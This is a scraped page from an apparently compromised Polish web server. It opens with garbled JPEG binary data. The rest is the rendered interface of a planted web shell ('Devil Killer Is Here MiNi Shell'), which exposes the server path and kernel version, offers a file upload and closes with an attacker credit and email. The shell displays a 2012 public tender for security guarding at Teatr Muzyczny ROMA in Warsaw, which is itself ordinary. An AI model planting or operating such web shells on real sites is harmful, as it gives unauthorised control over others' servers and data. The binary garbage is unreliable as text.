JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120606/191840-N-2012.html

<p class="kh_header"><b>Warszawa: CAŁODOBOWA OCHRONA ORAZ DOZÓR OSÓB I MIENIA W BUDYNKU TM ROMA W WARSZAWIE</b><br>
<b>Numer ogłoszenia: 191840 - 2012; data zamieszczenia: 06.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Teatr Muzyczny ROMA w Warszawie , ul. Nowogrodzka 49, 00-695 Warszawa, woj. mazowieckie, tel. 022 6287071, faks 022 6217233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://teatrroma.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> CAŁODOBOWA OCHRONA ORAZ DOZÓR OSÓB I MIENIA W BUDYNKU TM ROMA W WARSZAWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje całodobową ochronę i dozór osób i mienia w budynku Teatru Muzycznego ROMA w Warszawie przy ul. Nowogrodzkiej 49, poprzez stałą (całodobową) i bezpośrednią ochronę fizyczną wraz z dozorem sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych zainstalowanych w Teatrze - dotyczących instalacji antywłamaniowej oraz Systemu Sygnalizacji pożarowej, monitoringu pożarowego oraz Dźwiękowego Systemu Ostrzegawczego.

Przedmiotem zamówienia jest ochrona Teatru Muzycznego ROMA w Warszawie zawierająca się w następujących działaniach:
1)	Prowadzenie przez 24 h/dobę ochrony budynku stanowiącego siedzibę Zamawiającego przez dwóch agentów ochrony w godzinach 18.00 - 6.00, a przez jednego agenta ochrony w godzinach 6.00 - 18.00;
2)	Czuwanie nad bezpieczeństwem osób i mienia znajdujących się na strzeżonym terenie;
3)	Przeciwdziałanie kradzieżom i napadom rabunkowym oraz dewastacji mienia;
4)	Dodatkowa ochrona obiektu od strony ul. Nowogrodzkiej 49 (wejście dla widzów) w porze dziennej, tj. w czasie trwania castingów, spektakli, widowisk i konferencji prasowych w liczbie ok. 300 imprez w ciągu roku, przez jednego agenta ochrony. Czas trwania jednego spektaklu do 5 godzin.
5)	Dodatkowa ochrona obiektu od strony ul. Św. Barbary 12 - NOVA SCENA w czasie trwania castingów, spektakli, widowisk i konferencji prasowych, w liczbie ok. 200 imprez w ciągu roku, przez jednego agenta ochrony. Czas trwania spektaklu do 4 godz.;
6)	Prowadzenie obsługi portierni: obsługa interesantów, zatrzymywanie i nie wpuszczanie osób nieupoważnionych na chroniony teren, wydawanie identyfikatorów  GOŚĆ lub przepustek, udzielanie wszechstronnej informacji klientom i służenie im pomocą, odbieranie i przekierowanie rozmów telefonicznych, wydawanie kluczy osobom uprawnionym, tylko za pokwitowaniem, w tym celu obowiązkowe jest prowadzenie Książki kluczy, kontrola wynoszonego i wnoszonego sprzętu i przedmiotów. Na wnoszony i wynoszony sprzęt i przedmioty konieczna jest zgoda Kierownictwa teatru, w tym celu obowiązkowe jest prowadzenie ewidencji wnoszonego i wynoszonego sprzętu;
7)	Sprawdzanie czy osoby przebywające w ochranianym budynku poza dniami i godzinami pracy są do tego uprawnione;
8)	Odbieranie i przechowywanie, w czasie nieobecności pracowników Teatru lub obsługi kancelaryjnej Teatru, przesyłek, ofert, listów itp. w sposób zapewniający ich nienaruszalność;
9)	Dokonywanie obchodów siedziby zamawiającego celem skontrolowania prawidłowego zamknięcia wszystkich okien, drzwi zewnętrznych i wewnętrznych oraz wygaszenia zbędnego oświetlenia oraz skontrolowanie prawidłowego funkcjonowania urządzeń i instalacji technicznych w budynku;
10)	Zapalanie i gaszenie świateł nocnych zewnętrznych i wewnętrznych w zależności od pory roku;
11)	Prowadzenie książki raportów w której odnotowane są na bieżąco wszelkie nieprawidłowości uwagi i przebieg służby, zawierającej imię i nazwisko osoby pełniącej służbę, godziny pełnienia służby, imiona i nazwiska osób przebywających w obrębie ochranianego obiektu poza godzinami pracy wraz z podaniem godziny ich przyjścia i wyjścia;
12)	Podejmowanie wszelkich niezbędnych czynności mających na celu zapewnienie prawidłowej realizacji przedmiotu zamówienia;
13)	Wykonywanie poleceń związanych z maksymalnym zapewnieniem bezpieczeństwa w danym obiekcie;
14)	Kontrola systemu antywłamaniowego oraz ciągły nadzór  nad Systemem  Sygnalizacji Pożaru oraz jego obsługa jak również obsługa Systemu Monitoringu przeciwpożarowego oraz Dźwiękowego Systemu Ostrzegawczego, którego elementy zainstalowane są w portierni Teatru. Wyżej wymienione czynności będą wymagały odbycia szkolenia w zakresie ich wykonywania w siedzibie T.M.ROMA. Podjęcie działań określonych w procedurach Zamawiającego w przypadku  prawdziwego alarmu pożarowego, codzienne sprawdzanie wskazań poziomu wody w zbiornikach oraz sprawdzanie na manometrach prawidłowego ciśnienia przed i za zaworami kontrolno-alarmowymi w zbiorniku hydroforowym (po przeszkoleniu przez firmę zajmującą się konserwacją , wyżej opisanych urządzeń), wykonywanie czynności kontrolnych stałej instalacji gaśniczej - tryskaczowej wodnej, urządzeń wodno-kanalizacyjnych, c.o., c.w., z.w., itp.;
15)	Obserwacja systemu kamer telewizji przemysłowej;
16)	Powiadamianie właściwych służb interwencyjnych (policja, straż pożarna, pogotowie ratunkowe i agencji ochroniarskiej wskazanej przez Zamawiającego) o ewentualnych zdarzeniach;
17)	Zainstalowanie czujek kontrolnych (kontaktrony) wraz z czytnikiem w celu umożliwienia kontroli przez Zamawiającego dokonywanych nocnych obchodów Teatru przez pracowników Wykonawcy;
18)	Zainstalowanie przez Wykonawcę w dwóch pomieszczeniach wskazanych przez Zamawiającego systemu antynapadowego połączonego z monitoringiem załóg interwencyjnych:
Agenci ochrony wykonujący czynności objęte zamówieniem u Zamawiającego powinni zostać wyposażeni, na koszt Wykonawcy, w estetyczne i jednolite umundurowanie służbowe pod krawatem, z emblematami firmowymi. Pracownicy są zobowiązani dbać o schludny wygląd zewnętrzny. Ponadto wszyscy agenci ochrony powinni zostać wyposażeni przez Wykonawcę w imienne identyfikatory ze zdjęciem oraz w środki łączności bezprzewodowej telefonii komórkowej oraz systemy przywoławcze (bezpieczeństwa indywidualnego). Pracownicy ochrony powinni być wspomagani przez załogi interwencyjne, które mają obowiązek przyjazdu na każde wezwanie pracowników pełniących dyżur u Zamawiającego.

Zamawiający wymaga aby dyżurujący pracownicy ochrony w siedzibie Zamawiającego zostali starannie dobrani przez Wykonawcę, byli sprawni fizycznie, posiadali odpowiednie kwalifikacje opisane poniżej, byli obdarzeni predyspozycjami do wykonywania powierzonych zadań w ochronie Teatru, przestrzegali zasad należytego zachowania się w służbie, dbali o swoje miejsce pracy oraz o swój wygląd zewnętrzny, powinni dokładnie znać przepisy ppoż. obowiązujące na ochranianym obiekcie i tryb postępowania w sytuacjach zagrożeń, a także sumiennie i dokładnie wykonywać zadania służbowe w celu zapewnienia bezpieczeństwa publicznego i właściwej ochrony mienia TM ROMA;

Wykonawca będzie zobowiązany do wyznaczenia koordynatora ds. ochrony obiektu, który na bieżąco będzie sprawował merytoryczny oraz dyscyplinarny nadzór i kierownictwo nad swoimi pracownikami będzie czuwał nad jakością i rzetelnością w zakresie prawidłowej ochrony.

Zamawiający zastrzega sobie prawo do żądania zmiany wyznaczonych do pełnienia dyżurów w siedzibie Zamawiającego agentów ochrony. Żądanie zmiany agenta powinno być umotywowane przez Zamawiającego. O ile Zamawiający umotywuje żądanie zmiany Wykonawca będzie zobowiązany do zastosowania się do żądania Zamawiającego i wyznaczenia innego agenta ochrony do pełnienia służby w budynku Zamawiającego.

Przed rozpoczęciem wykonywania czynności objętych zamówieniem Wykonawca będzie zobowiązany do przedstawienia kandydatur na stanowiska agentów ochrony w siedzibie Zamawiającego i uzyskania akceptacji Zamawiającego. Zamawiający dokona wyboru wedle własnego uznania i w oparciu o własne kryteria oceny agentów ochrony mających pełnić służbę w Teatrze Muzycznym ROMA.

Wszyscy pracownicy Wykonawcy oddelegowani do pełnienia usług ochrony i dozoru mienia i osób powinni posiadać co najmniej licencję pracownika ochrony fizycznej osób i mienia I stopnia (zgodnie z obowiązującymi przepisami; licencje zostaną przedstawione Zamawiającemu przed podpisaniem Umowy) oraz co najmniej 2 letnie udokumentowane doświadczenie zawodowe w wykonywaniu usług ochrony fizycznej i nie mogą być rencistami lub w wieku emerytalnym.

Wykonawca będzie zobowiązany w czasie trwania usług ochrony na rzecz Zamawiającego posiadać ważne ubezpieczenie od odpowiedzialności cywilnej obejmujące wszystkie występujące w tego typu pracy ryzyka na kwotę nie mniejszą niż 500 000 zł.

Wykonawca rozpocznie wykonywanie usług począwszy od dnia 07.07.2012 r. od godz. 9:00 do 07.07.2014 r. do godz. 9:00 i będzie świadczył usługi przez okres 24 miesięcy.
      
Żaden z pracowników Wykonawcy nie może opuścić swojego stanowiska do momentu przekazania tego stanowiska zmiennikowi.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielania zamówień uzupełniających polegających na świadczeniu usług ochrony w wysokości do 20% wartości zamówienia podstawowego. Zamówienia uzupełniające zostaną udzielone w przypadku zmiany w planach repertuarowych lub zaistnienia istotnych z punktu widzenia Zamawiającego przesłanek skutkujących koniecznością wykonania dodatkowych usług zabezpieczających i ochroniarskich. Zamówienia uzupełniające mogą zostać udzielone również w przypadku gdy bufet lub bufety Teatru będą otwarte dłużej niż czas trwania spektakli lub imprez w siedzibie Zamawiającego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 07.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące:

a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
b) posiadania wiedzy i doświadczenia;
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do
wykonania zamówienia;
d) sytuacji ekonomicznej i finansowej.

2. Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń.

Ocena spełnienia wyżej określonych warunków odbędzie się wg formuły: spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku udziału w postępowaniu skutkować będzie wykluczeniem Wykonawcy z postępowania.

Dokumenty powinny zostać dostarczone w formie oryginału lub kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem. 

3. Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu oraz wykażą, iż:

a) wykażą, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - należycie zrealizowali lub realizują (w przypadku świadczeń okresowych lub ciągłych) jeden kontrakt na kwotę nie mniejszą niż 200 000 zł brutto, obejmujący pełnienie usług ochrony mienia i osób w obiektach użyteczności publicznej z salami widowiskowymi, a w szczególności w placówkach kulturalnych takich jak teatry muzea, domy kultury, opery itp., gdzie sala widowiskowa przeznaczona jest na nie mniej niż 500 osób,

b) wykażą, iż dysponują opłaconą polisą, a w przypadku jej braku innym dokumentem potwierdzającym fakt ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 500 000 zł,

c) dysponują ważną koncesją na wykonywanie usług ochrony.

4. Wykonawca jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert, spełnianie warunków udziału w postępowaniu i w tym celu powinien przedstawić dokumenty i oświadczenia, o których mowa w sekcji III.4.1 Ogłoszenia. Ponadto Wykonawca powinien wykazać brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 PZP - lista dokumentów potwierdzających brak podstaw do wykluczenia z postępowania zawarta została w sekcji III.4.2 - III.4.3 Ogłoszenia. 

5. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu oraz wykażą, iż wykażą, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - należycie zrealizowali lub realizują (w przypadku świadczeń okresowych lub ciągłych) jeden kontrakt na kwotę nie mniejszą niż 200 000 zł brutto, obejmujący pełnienie usług ochrony mienia i osób w obiektach użyteczności publicznej z salami widowiskowymi, a w szczególności w placówkach kulturalnych takich jak teatry muzea, domy kultury, opery itp., gdzie sala widowiskowa przeznaczona jest na nie mniej niż 500 osób,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu oraz wykażą, iż dysponują opłaconą polisą, a w przypadku jej braku innym dokumentem potwierdzającym fakt ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 500 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega możliwość wprowadzenia zmiany postanowień umownych o ile po zawarciu umowy ulegnie zmianie obowiązująca stawka podatku VAT, to wynagrodzenie umowne zostanie odpowiednio skorygowane przez strony umowy. Stawka podatku VAT, zostanie naliczona i zapłacona w kwotach należnych według przepisów prawa polskiego w sprawie VAT, obowiązujących na dzień wystawienia faktury lub rachunku przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://teatrroma.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Teatr Muzyczny ROMA w Warszawie, ul. Nowogrodzka 49, 00-695 Warszawa. Sekretariat Teatru (pok. 10, parter) pracuje od poniedziałku do piątku w godzinach 9:00-17:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2012 godzina 12:00, miejsce: Teatr Muzyczny ROMA w Warszawie, ul. Nowogrodzka 49, 00-695 Warszawa. Sekretariat Teatru (pok. 10, parter) pracuje od poniedziałku do piątku w godzinach 9:00-17:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zgodnie z art. 5 ust. 1 Ustawy, Zamawiający prowadząc postępowanie w celu udzielenia zamówienia na usługi niepriorytetowe (79710000-4 Usługi ochroniarskie) jest uprawniony do wyznaczenia terminu składania ofert krótszego niż wymieniony w art. 43 ust. 1 Ustawy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com